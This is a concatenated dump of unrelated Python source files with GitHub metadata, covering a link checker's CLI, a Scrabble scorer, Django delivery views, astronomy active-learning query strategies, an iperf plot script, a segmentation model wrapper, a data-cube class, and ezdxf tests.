allowed_debugs:\n print_usage(_(\"Invalid debug level %(level)r\") % {\"level\": _name})\n logconf.set_debug(options.debug)\n elif options.quiet:\n logconf.reset_loglevel()\n log.debug(\n LOG_CMDLINE,\n _(\"Python %(version)s on %(platform)s\")\n % {\"version\": sys.version, \"platform\": sys.platform},\n )\n # read configuration files\n try:\n files = []\n if options.configfile:\n path = configuration.normpath(options.configfile)\n if os.path.isfile(path):\n files.append(path)\n else:\n log.warn(\n LOG_CMDLINE, _(\"Unreadable config file: %r\"), options.configfile)\n config.read(files=files)\n except LinkCheckerError as msg:\n # config error\n print_usage(str(msg))\n drop_privileges()\n # set up config object using options\n setup_config(config, options)\n # now sanitize the configuration\n config.sanitize()\n\n log.debug(LOG_CMDLINE, \"configuration: %s\", pprint.pformat(sorted(config.items())))\n\n # prepare checking queue\n aggregate = get_aggregate(config)\n if options.trace:\n # enable thread tracing\n config[\"trace\"] = True\n # start trace in mainthread\n from .. import trace\n\n trace.trace_filter([r\"^linkcheck\"])\n trace.trace_on()\n # add urls to queue\n if options.stdin:\n for url in read_stdin_urls():\n aggregate_url(aggregate, url)\n elif options.url:\n for url in options.url:\n aggregate_url(aggregate, stripurl(url))\n else:\n log.warn(LOG_CMDLINE, _(\"no files or URLs given\"))\n # set up profiling\n do_profile = False\n if options.profile:\n if has_profile:\n if os.path.exists(_profile):\n print(\n _(\n \"Overwrite profiling file %(file)r?\\n\"\n \"Press Ctrl-C to cancel, RETURN to continue.\"\n )\n % {\"file\": _profile}\n )\n try:\n input()\n except KeyboardInterrupt:\n print(\"\", _(\"Canceled.\"), file=sys.stderr, sep=\"\\n\")\n sys.exit(1)\n do_profile = True\n else:\n log.warn(\n LOG_CMDLINE,\n _(\n \"The `yappi' Python module is not installed,\"\n \" therefore the --profile option is disabled.\"\n ),\n )\n\n # finally, start checking\n if do_profile:\n import yappi\n\n yappi.start()\n check_urls(aggregate)\n yappi.stop()\n yappi.get_func_stats().save(_profile)\n else:\n check_urls(aggregate)\n if config[\"debugmemory\"]:\n from .. import memoryutil\n\n if has_meliae:\n log.info(LOG_CMDLINE, _(\"Dumping memory statistics...\"))\n filename = memoryutil.write_memory_dump()\n message = _(\"The memory dump has been written to `%(filename)s'.\")\n log.info(LOG_CMDLINE, message % dict(filename=filename))\n else:\n log.warn(LOG_CMDLINE, memoryutil.MemoryDebugMsg)\n\n stats = config[\"logger\"].stats\n # on internal errors, exit with status 2\n if stats.internal_errors:\n sys.exit(2)\n # on errors or printed warnings, exit with status 1\n if stats.errors or (stats.warnings_printed and config[\"warnings\"]):\n sys.exit(1)\n","repo_name":"linkchecker/linkchecker","sub_path":"linkcheck/command/linkchecker.py","file_name":"linkchecker.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":774,"dataset":"github-code","pt":"53"} +{"seq_id":"27721333598","text":"#!/usr/bin/python3\n\nletters = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\npoints = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 4, 1, 3, 10, 1, 1, 1, 1, 4, 4, 8, 4, 10]\n\nletter_to_points = {key:val for key, val in zip(letters, points)}\nletter_to_points[\" \"] = 0\n#for key, val in zip(letters, points):\n#\tprint(f\"{key} = {val} pts\")\n\ndef score_word(word):\n\tpoint_total = 0\n\tfor char in word:\n\t\tif char.upper() in letter_to_points:\n\t\t\tpoint_total += int(letter_to_points.get(char.upper()))\n\t\telse:\n\t\t\tpoint_total += 0\n#\tprint(f\"Point total for {word} is {point_total}\")\n\treturn point_total\n\t\ndef play_word(player, word):\n\tglobal player_to_words\n\tplayer_to_words[player].append(word)\n\t\nplayer_to_words = {\t'player1' : [\"BLUE\", \"TENNIS\", \"EXIT\"],\n \t\t'wordNerd' : [\"EARTH\", \"EYES\", \"MACHINE\"],\n \t\t'Lexi Con' : [\"ERASER\", \"BELLY\", \"HUSKY\"],\n \t\t'Prof Reader' : [\"ZAP\", \"COMA\", \"PERIOD\"] }\n\ndef update_point_totals():\n\tglobal player_to_words\n\tplayer_to_points = {}\n\tfor player in player_to_words:\n\t\tplayer_points = 0\n\t\twords = player_to_words[player]\n\t\tfor word in words:\n\t\t\tplayer_points += score_word(word)\n\t\tplayer_to_points[player] = player_points\n\t\tprint(f\"{player} has {player_to_points[player]} pts.\")\n\nplay_word(\"player1\", \"SCOPA\")\nupdate_point_totals()\nprint(player_to_words[player])\n","repo_name":"cpm260/ITP270","sub_path":"scrabble.py","file_name":"scrabble.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32963758968","text":"import json\nfrom django.db.models.fields import BooleanField\nfrom django.http import request\nfrom django.shortcuts import render\nfrom django.http.response import JsonResponse\nfrom django.views import View\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Biker_Profile, OrderBiker\nfrom cart.models import CartSystem\nfrom user.models import User\n# Create your views here.\n\n@method_decorator(csrf_exempt, name = 'dispatch')\nclass BIKER(View):\n #add-biker-info\n #error here\n def post(self, request):\n try:\n data = json.loads(request.body.decode('utf-8'))\n profile = {}\n names = Biker_Profile._meta.fields\n for i in names:\n profile[i.name] = data.get(i.name)\n \n x = Biker_Profile.objects.create(**profile)\n response = {\"response\":True,\n 'msg':'ADDED'}\n return JsonResponse(response)\n except Exception as e:\n response = {\"response\":False,\n 'msg':str(e)}\n return JsonResponse(response)\n\n\n \n #GET ALL THROUGH DELIVERY STATUS using delivery condition\n #get-orders-status/\n def get(self,request,status):\n try:\n all_data = OrderBiker.objects.filter(delivery_status = status)\n \n msg = []\n for data in all_data:\n x = CartSystem.objects.get(pk =data.order_id_to_biker_id )\n profile = Biker_Profile.objects.get(pk = data.biker_id_id)\n msg.append({\n \"id\":data.pk,\n 'user name': User.objects.get(pk = x.user_id_id).name,\n 'delivery_status':data.delivery_status,\n 'address':data.address,\n 'contact':data.contact,\n 'biker_data':{\n 'order_id': x.order_id,\n 'name': profile.name,\n 'contact':profile.number\n \n }\n })\n\n information = {\"msg\":msg}\n return JsonResponse(information)\n except Exception as e:\n return JsonResponse({\"msg\":str(e)})\n\n '''\n put function to make the order now-delivering / in-delivering\n from table cart-system and biker-order\n This function is used by the biker, to make the \n order column delivery_status\n \n '''\n # put-delivery-status\n def put(self,request):\n try:\n data = json.loads(request.body.decode(\"utf-8\"))\n status = data.get('delivery_status')\n cart_system = CartSystem.objects.get(pk = data.get(\"cart_id\"))\n orderbiker = OrderBiker.objects.get(pk = data.get('id'))\n\n old_status = orderbiker.delivery_status\n #--- updating the cart\n cart_system.delivery_status = status\n cart_system.save()\n \n orderbiker.delivery_status = status\n\n orderbiker.save()\n #print(data.get('cart_id'))\n #print(cart_system.order_id)\n #print(orderbiker.delivery_status)\n #print(cart_system.delivery_staus)\n msg = {\"msg\":f\"status updated from {old_status} to {status}\",\n 'reponse':200}\n return JsonResponse(msg)\n\n except Exception as e:\n msg = {\"msg\":f\"status updated from {old_status} to {status}\",\n 'response':500}\n return JsonResponse(msg)\n ","repo_name":"muhammad-usman147/GroceryApp-Python-Flutter","sub_path":"grocery/biker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73037022887","text":"import numpy as np\nfrom resspect.batch_functions import *\n\ndef batch_queries_uncertainty(class_probs, id_name, queryable_ids,\n pool_metadata, budgets, criteria):\n \"\"\"Select batch of queries based on acquistion criteria. Independently\n models the elements of the batch.\n\n Parameters\n ----------\n class_prob: np.array\n Classification probability. One value per class per object.\n id_name: str\n key to index ids from pool_metadata\n queryable_ids: np.array\n Set of ids for objects available for querying.\n pool_metadata: pandas Dataframe\n Contains infromation relevant to the poolset such as costs and ids.\n budgets: tuple of ints\n budgets for each of the telescopes assumes 0th index is for 4m and\n 1th index is for 8m.\n criteria: str\n Acqution strategy to use can be 'uncertainty', 'entropy', 'margin',\n 'least_confident' and 'random'.\n\n Returns\n -------\n acquistion_index: list\n List of indexes identifying the objects from the pool sampled to be\n queried. Guranteed to be within budget.\n \"\"\"\n pool_ids = pool_metadata[id_name].values\n budget_4m = budgets[0]\n budget_8m = budgets[1]\n index_to_ids = {i: q_id for i, q_id in enumerate(queryable_ids)}\n ids_to_index = {i_d: i for i, i_d in enumerate(pool_metadata['id'].values)}\n pool_query_filter = np.array([p_id in queryable_ids for p_id in pool_ids])\n\n cost_4m = pool_metadata['cost_4m'].values[pool_query_filter]\n cost_8m = pool_metadata['cost_8m'].values[pool_query_filter]\n cost_4m[cost_4m >= 9999.0] = 1e8\n cost_8m[cost_8m >= 9999.0] = 1e8\n possible_4m = cost_4m < 1e8\n possible_8m = cost_8m < 1e8\n query_ids = pool_ids[pool_query_filter]\n\n class_probs = class_probs[pool_query_filter]\n\n if criteria == 'uncertainty':\n score = abs(class_probs[:, 1] - 0.5)\n reversed = False\n elif criteria == 'entropy':\n entropies = (-1*np.sum(class_probs * np.log(class_probs + 1e-12), axis=1))\n score = entropies\n reversed = True\n elif criteria == 'margin':\n sorted_probs = np.sort(class_probs, axis=1)\n score = sorted_probs[:, -1] - sorted_probs[:, -2]\n reversed = False\n elif criteria == 'least_confident':\n score = class_probs.max(axis=1)\n reversed = False\n elif criteria == 'random':\n score = np.random.rand(class_probs.shape[0])\n reversed = False\n\n cost_4m_possible = cost_4m[possible_4m]\n score_4m = score[possible_4m]\n if reversed:\n order_4m = score_4m.argsort()[::-1]\n else:\n order_4m = score_4m.argsort()\n\n cost_4m_order = cost_4m_possible[order_4m]\n query_ids_4m_possible = query_ids[possible_4m][order_4m]\n\n # Record acquistions as IDs\n acquistions_4m = []\n total_cost_4m = 0.\n for q_id, c_4m in zip(query_ids_4m_possible, cost_4m_order):\n if (total_cost_4m + c_4m) < budget_4m:\n acquistions_4m.append(q_id)\n total_cost_4m += c_4m\n\n acquistions = acquistions_4m.copy()\n\n cost_8m_possible = cost_8m[possible_8m]\n score_8m = score[possible_8m]\n if reversed:\n order_8m = score_8m.argsort()[::-1]\n else:\n order_8m = score_8m.argsort()\n\n cost_8m_order = cost_8m_possible[order_8m]\n query_ids_8m_possible = query_ids[possible_8m][order_8m]\n\n acquistions_8m = []\n total_cost_8m = 0.\n for q_id, c_8m in zip(query_ids_8m_possible, cost_8m_order):\n if (total_cost_8m + c_8m) < budget_8m and (q_id not in acquistions):\n acquistions_8m.append(q_id)\n total_cost_8m += c_8m\n\n acquistions += acquistions_8m\n\n if total_cost_4m > budget_4m:\n raise RuntimeError(\"4m Budget exceeded\")\n if total_cost_8m > budget_8m:\n raise RuntimeError(\"8m Budget exceeded\")\n if len(acquistions) != len(set(acquistions)):\n raise RuntimeError(\"Some acquistions were repeated\")\n if len(set(acquistions_4m) & set(acquistions_8m)) != 0:\n raise RuntimeError(\"Object acquired by both telescopes\")\n\n acquistion_index = []\n for q_id in acquistions:\n acquistion_index.append(ids_to_index[q_id])\n\n return acquistion_index\n\ndef batch_queries_mi_entropy(probs_B_K_C, id_name, queryable_ids,\n pool_metadata, budgets, criteria=\"MI\" ):\n \"\"\"Select batch of queries based on acquistion criteria. Jointly models the\n elements of the batch.\n\n Parameters\n ----------\n probs_B_K_C: np.array\n Classification probabilitity distributions for each datapoint for each\n model in the committee (or sample from model posterior). B is the number\n of data points, K is the committee size and C is the number of classes.\n id_name: str\n key to index ids from pool_metadata\n queryable_ids: np.array\n Set of ids for objects available for querying.\n pool_metadata: pandas Dataframe\n Contains infromation relevant to the poolset such as costs and ids.\n budgets: tuple of ints\n budgets for each of the telescopes assumes 0th index is for 4m and\n 1th index is for 8m.\n criteria: str\n Acqution strategy to use can be 'uncertainty', 'entropy', 'margin',\n 'least_confident' and 'random'.\n\n Returns\n -------\n acquistion_index: list\n List of indexes identifying the objects from the pool sampled to be\n queried. Guranteed to be within budget.\n \"\"\"\n pool_ids = pool_metadata[id_name].values\n # Specifically queryable ids since we don't need ids to the pool in general.\n index_to_ids = {i: q_id for i, q_id in enumerate(queryable_ids)}\n ids_to_index = {i_d: i for i, i_d in enumerate(pool_metadata['id'].values)}\n pool_query_filter = np.array([p_id in queryable_ids for p_id in pool_ids])\n\n cost_4m = pool_metadata['cost_4m'].values[pool_query_filter]\n cost_8m = pool_metadata['cost_8m'].values[pool_query_filter]\n cost_4m[cost_4m >= 9999.0] = np.inf\n cost_8m[cost_8m >= 9999.0] = np.inf\n\n # For numerical reasons ie divide by zero etc.\n probs_B_K_C = probs_B_K_C[pool_query_filter]\n probs_B_K_C += 1.e-12\n\n conditional_entropies_B = compute_conditional_entropies_B(probs_B_K_C)\n B, K, C = probs_B_K_C.shape\n num_samples_per_ws = 40000 // K\n num_samples = num_samples_per_ws * K\n\n budget_4m = budgets[0]\n budget_8m = budgets[1]\n acquistions = []\n acquistions_4m = []\n acquistions_8m = []\n total_cost_4m = 0.\n total_cost_8m = 0.\n scores = []\n prev_joint_probs_M_K = None\n prev_samples_M_K = None\n top_scores = []\n\n is_time = True\n i = 0\n while is_time:\n #print(i)\n exact_samples = C ** i\n if exact_samples <= num_samples:\n if len(acquistions) == 0:\n joint_entropies_B = exact_batch(probs_B_K_C)\n else:\n prev_joint_probs_M_K = joint_probs_M_K(probs_B_K_C[acquistions[-1][None]], prev_joint_probs_M_K)\n joint_entropies_B = exact_batch(probs_B_K_C, prev_joint_probs_M_K)\n else:\n # Clear memory will be using sampling method from here on out.\n prev_joint_probs_M_K = None\n prev_samples_M_K = sample_M_K(probs_B_K_C[acquistions], S=num_samples_per_ws)\n joint_entropies_B = batch_sample(probs_B_K_C, prev_samples_M_K)\n\n if criteria == 'MI':\n batch_scores = joint_entropies_B - conditional_entropies_B\n #print(batch_scores.max())\n batch_scores = batch_scores - np.sum(conditional_entropies_B[acquistions])\n #print(batch_scores.max())\n elif criteria == 'entropy':\n batch_scores = joint_entropies_B\n\n # Adjust scores for cost\n scores_4m = batch_scores / cost_4m\n scores_4m[~np.isfinite(scores_4m)] = -np.inf\n scores_8m = batch_scores / cost_8m\n scores_8m[~np.isfinite(scores_8m)] = -np.inf\n\n scores_4m[acquistions] = -1 * np.inf\n scores_8m[acquistions] = -1 * np.inf\n\n # What objects can be observered within budget\n possible_4m = (cost_4m + total_cost_4m) <= budget_4m\n possible_4m[~np.isfinite(scores_4m)] = False\n possible_8m = (cost_8m + total_cost_8m) <= budget_8m\n possible_8m[~np.isfinite(scores_8m)] = False\n\n sorted_4m_idx = scores_4m.argsort()[::-1]\n possible_4m_order = np.where(possible_4m[sorted_4m_idx])[0]\n\n sorted_8m_idx = scores_8m.argsort()[::-1]\n possible_8m_order = np.where(possible_8m[sorted_8m_idx])[0]\n\n if np.any(possible_4m) and np.any(possible_8m):\n #print(\"BOTH POSSIBLE\")\n top_4m_score = scores_4m[sorted_4m_idx[possible_4m_order]][0]\n top_8m_score = scores_8m[sorted_8m_idx[possible_8m_order]][0]\n if top_4m_score >= top_8m_score:\n #print(\"Choose 4m\")\n top_score = top_4m_score\n selection = sorted_4m_idx[possible_4m_order][0]\n acquistions_4m.append(selection)\n total_cost_4m += cost_4m[selection]\n else:\n #print(\"Choose 8m\")\n top_score = top_8m_score\n selection = sorted_8m_idx[possible_8m_order][0]\n acquistions_8m.append(selection)\n total_cost_8m += cost_8m[selection]\n\n elif np.any(possible_4m) and not np.any(possible_8m):\n #print(\"Only 4m possible\")\n top_4m_score = scores_4m[sorted_4m_idx[possible_4m_order]][0]\n top_score = top_4m_score\n selection = sorted_4m_idx[possible_4m_order][0]\n acquistions_4m.append(selection)\n total_cost_4m += cost_4m[selection]\n\n elif not np.any(possible_4m) and np.any(possible_8m):\n #print(\"Only 8m possible\")\n top_8m_score = scores_8m[sorted_8m_idx[possible_8m_order]][0]\n top_score = top_8m_score\n selection = sorted_8m_idx[possible_8m_order][0]\n acquistions_8m.append(selection)\n total_cost_8m += cost_8m[selection]\n\n elif not np.any(possible_4m) and not np.any(possible_8m):\n #print(\"Budget Full\")\n is_time = False\n continue\n\n acquistions.append(selection)\n scores.append(batch_scores[selection])\n i += 1\n top_scores.append(top_score)\n #print(\"TOP SCORE: {}\".format(top_score))\n #print(acquistions[-1], total_cost_4m, total_cost_8m)\n #print()\n\n if total_cost_4m > budget_4m:\n raise RuntimeError(\"4m Budget exceeded\")\n if total_cost_8m > budget_8m:\n raise RuntimeError(\"8m Budget exceeded\")\n if len(acquistions) != len(set(acquistions)):\n raise RuntimeError(\"Some acquistions were repeated\")\n if len(set(acquistions_4m) & set(acquistions_8m)) != 0:\n raise RuntimeError(\"Object acquired by both telescopes\")\n\n acquistion_ids = []\n for index in acquistions:\n acquistion_ids.append(index_to_ids[index])\n\n acquistion_indexes = []\n for p_id in acquistion_ids:\n acquistion_indexes.append(ids_to_index[p_id])\n\n return acquistion_indexes\n","repo_name":"COINtoolbox/RESSPECT","sub_path":"resspect/query_budget_strategies.py","file_name":"query_budget_strategies.py","file_ext":"py","file_size_in_byte":11144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"6794629238","text":"import numpy as np\nimport os\nimport argparse\nimport matplotlib\nmatplotlib.rcParams['pdf.fonttype'] = 42\nfrom matplotlib import pyplot as plt\n\nDATA_PATHS = {\n \"a\": [\"mob_att_mp.txt\", \"mob_att_sp_mob.txt\", \"mob_att_sp_att.txt\"],\n \"b\": [\"mob_vz_mp.txt\", \"mob_vz_sp_mob.txt\", \"mob_vz_sp_vz.txt\"]\n}\n\nLABELS = {\n \"a\": [\"MPTCP\", \"MOB\", \"ATT\"],\n \"b\": [\"MPTCP\", \"MOB\", \"VZ\"]\n}\n\n\ndef parse_iperf(data_path):\n timestamp, throughput = [], []\n with open(data_path) as f:\n lines = f.readlines()\n\n while not \"sec \" in lines[0]:\n lines.pop(0)\n while \"sec \" in lines[0]:\n line = lines.pop(0)\n line_seg = line.split()\n line_seg = line_seg[line_seg.index(\"sec\")-1:]\n timestamp.append(float(line_seg[0].split('-')[0]))\n if 'G' in line_seg[5]:\n throughput.append(float(line_seg[4])*1000)\n elif 'M' in line_seg[5]:\n throughput.append(float(line_seg[4])) # Mbps\n elif 'K' in line_seg[5]:\n throughput.append(float(line_seg[4])/1000)\n else:\n throughput.append(float(line_seg[4])/1000000)\n\n return timestamp, throughput\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--fig\", type=str, default=\"a\", help='figure number (a or b)')\n args = parser.parse_args()\n fig = args.fig.lower()\n\n timestamps, results = [], []\n for data_path in DATA_PATHS[fig]:\n timestamp, result = parse_iperf(data_path)\n timestamps.append(timestamp)\n results.append(result)\n\n plt.rcParams.update({'font.size': 18})\n plt.figure(figsize=(10,4))\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Throughput (Mbps)\")\n labels = LABELS[fig]\n for i, (timestamp, result) in enumerate(zip(timestamps, results)):\n plt.plot(timestamp, result, label=labels[i], linewidth=1.8)\n plt.legend()\n plt.grid(True, linestyle='--')\n plt.tight_layout()\n plt.savefig(f\"mptcp_mob_{LABELS[fig][-1]}.pdf\")\n","repo_name":"Starlink-Project/Satellite-vs-Cellular","sub_path":"11-MPTCP-Thrpt/parse_iperf.py","file_name":"parse_iperf.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9025346708","text":"from Package.Task.Segmentation.SemanticSegmentation.D2.Dev import DevModel\nimport torch\nimport torchvision.models as models\nimport torch.nn as nn\nfrom typing import Union\n\n\nclass FCNResNet101Net(nn.Module):\n def __init__(\n self,\n pre_trained: bool = False,\n num_classes: int = 21,\n ):\n super().__init__()\n self.__model = models.segmentation.fcn_resnet101(\n pretrained=pre_trained,\n num_classes=num_classes\n )\n\n def forward(\n self,\n x: torch.Tensor\n ):\n res = self.__model(x)\n return res['out']\n\n\ndef get_fcn_resnet101(\n pre_trained: bool = False,\n num_classes: int = 21,\n) -> FCNResNet101Net:\n return FCNResNet101Net(\n pre_trained,\n num_classes,\n )\n\n\nclass FCNResNet101Model(DevModel):\n def __init__(\n self,\n net: Union[nn.Module, FCNResNet101Net]\n ):\n super().__init__(net)\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n return self.net(x)\n\n\ndef de_bug_model():\n x = torch.rand(size=(1, 3, 448, 448))\n m = get_fcn_resnet101(True, 21)\n y = m(x)\n # print(m)\n print(y.shape)\n print(y)\n\n\nif __name__ == '__main__':\n de_bug_model()\n","repo_name":"diyage/AllYouNeed","sub_path":"Demo/fcn_resnet101_semantic_segmentation/other/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"12313801765","text":"import json\nfrom collections import OrderedDict\n\n\nclass Cube(object):\n def __init__(self, dimensions):\n super().__init__()\n self.dimensions = dimensions\n self.cube = {}\n self.dictionaries = {}\n\n self._current_cells = {} # a dictionary dim->cell for the current fact\n\n @staticmethod\n def _get(fact, key):\n if callable(key):\n return key(fact)\n else:\n return fact[key]\n\n @staticmethod\n def _value(fact, dimension):\n \"\"\"\n Extract dimension value from fact.\n :param fact: The fact object, i.e. dict.\n :param dimension: The dimension specification.\n :returns: Tuple with the object that the values was directly taken from and the value.\n \"\"\"\n # determine parent based on parent key or parent function\n if \"parent\" in dimension:\n parent = Cube._get(fact, dimension[\"parent\"])\n else:\n parent = fact\n\n # use value function if there is one\n if callable(dimension[\"value\"]):\n return parent, dimension[\"value\"](parent)\n\n # determine parent based on qualified value key\n key = dimension[\"value\"]\n key_items = key.split(\".\")\n for key_item in key_items[:-1]:\n if parent is None:\n break\n parent = parent[key_item]\n\n # determine value\n if parent is None:\n value = None\n else:\n value = parent[key_items[-1]]\n\n return parent, value\n\n @staticmethod\n def _normalize(value):\n str_value = str(value)\n return str_value.replace(\"$\", \"&#FF04;\").replace(\".\", \"&#FF0E;\")\n\n def _cell(self, fact):\n cell = self.cube\n for dimension in self.dimensions:\n parent, value = self._value(fact, dimension)\n value = self._normalize(value)\n self._current_cells[dimension[\"name\"]] = cell, value\n is_new = value not in cell\n cell = cell.setdefault(value, {})\n\n if value is not None and is_new and \"dictionary\" in dimension:\n dictionary_spec = dimension[\"dictionary\"]\n dictionary = self.dictionaries.setdefault(dictionary_spec[\"dictionary\"], {})\n dictionary_key = self._normalize(self._get(parent, dictionary_spec[\"key\"]))\n dictionary[dictionary_key] = self._get(parent, dictionary_spec[\"value\"])\n\n return cell\n\n def add_fact(self, fact):\n cell = self._cell(fact)\n current = cell.get(\"_\", 0)\n cell[\"_\"] = current + 1\n\n def remove_fact(self, fact):\n cell = self._cell(fact)\n current = cell.get(\"_\", 0)\n if current == 0:\n # TODO clients should be warned about this situation\n pass\n cell[\"_\"] = current - 1\n\n if current == 1:\n # the cell is empty now, it can be removed\n del(cell[\"_\"])\n for dimension in reversed(self.dimensions):\n if len(cell) == 0:\n parent_cell, value = self._current_cells[dimension[\"name\"]]\n del(parent_cell[value])\n cell = parent_cell\n else:\n break\n\n def to_json(self):\n data = OrderedDict(dimensions=[dimension[\"name\"] for dimension in self.dimensions],\n cube=self.cube, dictionaries=self.dictionaries)\n return json.dumps(data, indent=2)\n\n","repo_name":"markus1978/cubefilter-python","sub_path":"cubefilter/cubefilter.py","file_name":"cubefilter.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70791145768","text":"import pytest\nfrom copy import deepcopy\nfrom ezdxf.math import Vector\nfrom ezdxf.entities.dxfentity import base_class, DXFAttributes, DXFNamespace, SubclassProcessor\nfrom ezdxf.entities.dxfgfx import acdb_entity\nfrom ezdxf.entities.line import acdb_line\nfrom ezdxf.lldxf.extendedtags import ExtendedTags\nfrom ezdxf.lldxf.const import DXFAttributeError\nfrom ezdxf.lldxf.tagwriter import TagCollector\n\n\nclass DXFEntity:\n \"\"\" Mockup \"\"\"\n DXFTYPE = 'DXFENTITY'\n DXFATTRIBS = DXFAttributes(base_class, acdb_entity, acdb_line)\n\n\n@pytest.fixture\ndef entity():\n return DXFEntity()\n\n\n@pytest.fixture\ndef processor():\n return SubclassProcessor(ExtendedTags.from_text(TEST_1))\n\n\ndef test_handle_and_owner(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.handle == 'FFFF'\n assert attribs.owner == 'ABBA'\n assert attribs._entity is entity\n\n\ndef test_default_values(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.layer == '0'\n assert attribs.color == 256\n assert attribs.linetype == 'BYLAYER'\n # this attributes do not really exist\n assert attribs.hasattr('layer') is False\n assert attribs.hasattr('color') is False\n assert attribs.hasattr('linetype') is False\n\n\ndef test_get_value_with_default(entity, processor):\n attribs = DXFNamespace(processor, entity)\n # return existing values\n assert attribs.get('handle', '0') == 'FFFF'\n # return given default value not DXF default value, which would be '0'\n assert attribs.get('layer', 'mozman') == 'mozman'\n # attribute has to a valid DXF attribute\n with pytest.raises(DXFAttributeError):\n _ = attribs.get('hallo', 0)\n\n # attribs without default returns None -> will not exported to DXF file\n assert attribs.color_name is None\n\n\ndef test_set_values(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.handle = 'CDEF'\n assert attribs.handle == 'CDEF'\n attribs.set('owner', 'DADA')\n assert attribs.owner == 'DADA'\n # set new attribute\n attribs.color = 7\n assert attribs.color == 7\n attribs.set('linetype', 'DOT')\n assert attribs.linetype == 'DOT'\n # attribute has to a valid DXF attribute\n with pytest.raises(DXFAttributeError):\n attribs.hallo = 0\n with pytest.raises(DXFAttributeError):\n attribs.set('hallo', 0)\n\n\ndef test_value_types(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.handle = None # None is always accepted, attribute is ignored at export\n assert attribs.handle is None\n attribs.handle = 'XYZ'\n assert attribs.handle == 'XYZ', 'handle is just a string'\n attribs.handle = 123\n assert attribs.handle == '123', 'handle is just a string'\n with pytest.raises(ValueError):\n attribs.color = 'xxx'\n\n attribs.start = (1, 2, 3) # type: Vector\n assert attribs.start == (1, 2, 3)\n assert attribs.start.x == 1\n assert attribs.start.y == 2\n assert attribs.start.z == 3\n\n\ndef test_delete_attribs(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.layer = 'mozman'\n assert attribs.layer == 'mozman'\n del attribs.layer\n\n # default value\n assert attribs.layer == '0'\n with pytest.raises(DXFAttributeError):\n del attribs.color\n attribs.discard('color') # delete silently if not exists\n with pytest.raises(DXFAttributeError):\n del attribs.color\n\n\ndef test_is_supported(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.is_supported('linetype') is True\n assert attribs.is_supported('true_color') is True # ezdxf does not care about DXF versions at runtime\n assert attribs.is_supported('xxx_mozman_xxx') is False\n\n\ndef test_dxftype(entity, processor):\n attribs = DXFNamespace(processor, entity)\n assert attribs.dxftype == 'DXFENTITY'\n\n\ndef test_cloning(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.color = 77\n attribs2 = attribs.copy(entity)\n # clone everything\n assert attribs2._entity is attribs._entity\n assert attribs2.handle is attribs.handle\n assert attribs2.owner is attribs.owner\n assert attribs2.color == 77\n # do not harm original entity\n assert attribs._entity is entity\n assert attribs.handle == 'FFFF'\n assert attribs.owner == 'ABBA'\n # change clone\n attribs2.color = 13\n assert attribs.color == 77\n assert attribs2.color == 13\n\n\ndef test_deepcopy_usage(entity, processor):\n attribs = DXFNamespace(processor, entity)\n attribs.color = 77\n\n attribs2 = deepcopy(attribs)\n # clone everything\n assert attribs2._entity is attribs._entity\n assert attribs2.handle is attribs.handle\n assert attribs2.owner is attribs.owner\n assert attribs2.color == 77\n # do not harm original entity\n assert attribs._entity is entity\n assert attribs.handle == 'FFFF'\n assert attribs.owner == 'ABBA'\n # change clone\n attribs2.color = 13\n assert attribs.color == 77\n assert attribs2.color == 13\n\n\ndef test_dxf_export_one_attribute(entity, processor):\n attribs = DXFNamespace(processor, entity)\n tagwriter = TagCollector()\n attribs.export_dxf_attribs(tagwriter, 'handle')\n assert len(tagwriter.tags) == 1\n assert tagwriter.tags[0] == (5, 'FFFF')\n with pytest.raises(DXFAttributeError):\n attribs.export_dxf_attribute(tagwriter, 'mozman')\n\n\ndef test_dxf_export_two_attribute(entity, processor):\n attribs = DXFNamespace(processor, entity)\n tagwriter = TagCollector()\n attribs.export_dxf_attribs(tagwriter, ['handle', 'owner'])\n assert len(tagwriter.tags) == 2\n assert tagwriter.tags[0] == (5, 'FFFF')\n assert tagwriter.tags[1] == (330, 'ABBA')\n\n\ndef test_load_doublettes():\n from ezdxf.lldxf.attributes import DefSubclass, DXFAttr\n from ezdxf.lldxf.tags import Tags, DXFTag\n subclass = DefSubclass('AcDbTest', {\n 'test1': DXFAttr(1),\n 'test2': DXFAttr(2),\n 'test3': DXFAttr(1), # same group code for different attribute\n })\n\n class TestEntity(DXFEntity):\n DXFATTRIBS = DXFAttributes(subclass)\n\n data = Tags([\n DXFTag(1, '1'),\n DXFTag(2, '2'),\n DXFTag(1, '3'),\n ])\n ns = DXFNamespace(entity=TestEntity())\n SubclassProcessor.load_tags_into_namespace(ns, data, subclass)\n assert ns.test1 == '1'\n assert ns.test2 == '2'\n assert ns.test3 == '3'\n\n\nTEST_1 = 